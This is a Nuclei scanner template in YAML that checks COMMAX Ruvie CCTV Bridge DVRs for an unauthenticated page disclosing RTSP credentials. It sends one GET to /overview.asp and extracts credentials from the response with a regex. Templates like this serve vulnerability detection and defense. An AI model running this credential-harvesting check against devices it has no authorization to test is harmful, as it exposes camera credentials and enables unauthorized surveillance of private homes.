37 lines
1.0 KiB
YAML
37 lines
1.0 KiB
YAML
id: commax-credentials-disclosure
|
|
|
|
info:
|
|
name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
|
|
author: gy741
|
|
severity: critical
|
|
description: |
|
|
The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
|
|
reference:
|
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
|
|
metadata:
|
|
max-request: 1
|
|
tags: commax,exposure,camera,iot
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/overview.asp"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "DVR Lists"
|
|
- "rtsp://"
|
|
- "login_check.js"
|
|
- "MAX USER :"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'
|
|
|
|
# digest: 490a004630440220445f653a4ca0ee96a86686fdf857bf01342c5e416fbaf3ce81453fd4a7ae323c02203d3075961902e759921cd9a5cadb81f3daf09c9b44b16a878ce20f1cb83300f3:922c64590222798bb761d5b6d8e72950
|